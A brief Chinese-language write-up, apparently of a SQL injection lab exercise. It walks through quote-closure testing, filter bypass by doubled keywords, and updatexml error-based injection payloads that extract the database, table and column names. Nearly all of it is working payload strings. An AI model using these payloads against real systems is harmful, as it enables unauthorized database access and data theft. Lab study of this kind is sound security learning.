0X01
测试闭合 单引号报错 双引号不报错 ’闭合
构造语句 过滤了空格和and
?id=1' anandd 1=1%23
?id=1'+anandd+1=1%23
百度一下
一去看源码 真的顶不住
那我们就别光想着正确的地方输入了 我们用报错注入
?id=1'||updatexml(1,concat(':',(select database())),1)||'1'='1
0X02爆表名
but 好像不行
1'||updatexml(1,concat(':',(select table_name from informatiom_schema.tables where table_schema='security' limit 0,1)),1)||'1'='1
绕过
0'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1
0X03爆破列名
?id=-1%27||updatexml(1,concat(%27%%27,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name=%27users%27))),1)||%271%27=%271
hint:group_concat(table_name)) 第一个括号是闭合select 之后的空格 第二个括号是闭合group_caoncat语法
加油学习 切记 学习之路 少就是多 慢就是快